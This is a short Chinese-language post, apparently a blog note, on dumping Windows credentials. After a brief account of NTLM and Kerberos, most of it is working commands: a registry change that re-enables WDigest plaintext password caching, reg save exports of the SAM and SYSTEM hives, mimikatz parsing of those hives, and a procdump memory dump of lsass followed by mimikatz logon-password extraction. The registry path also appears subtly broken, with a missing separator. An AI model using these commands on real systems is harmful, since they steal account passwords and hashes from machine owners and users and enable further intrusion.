Windows hash抓取
一、windows系统的身份认证
1、ntlm
当ntlm用于没域环境的本地认证时:开机调用登录框让你输密码,系统把密码传给lsass.exe进程。lsass把你输入的密码二话不说先在内存中存一份明文的,当把明文密码加密成NTLM hash之后和windows系统本地存储的SAM数据库中这个登录用户的NTLM hash进行对比,如果一致则登录成功
当ntlm用于有域环境的网络认证时:可以使用kerberos,也可以使用ntlm。这里的ntlm基于一种叫做challenge/response的机制。
2、Kerberos
用于域环境认证
3、hash明文
高版本windows系统(win10、win2012 R2以上版本存在只能抓hash不能抓明文的问题,会显示null,因为系统内存缓存中不再存有明文了)
想要继续抓明文要改注册表:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
二、本地抓取hash
reg save hklm\sam sam.hive
reg save hklm\system system.hive
mimikatz "lsadump::sam /sam:sam.hive /system:system.hive" > hash.txt
三、procdump抓取lsass进程hash
procdump.exe -accepteula -ma lsass.exe xx.dmp
mimikatz.exe "sekurlsa::minidump xx.dmp" "sekurlsa::logonPasswords full" > hash.txt
浙公网安备 33010602011771号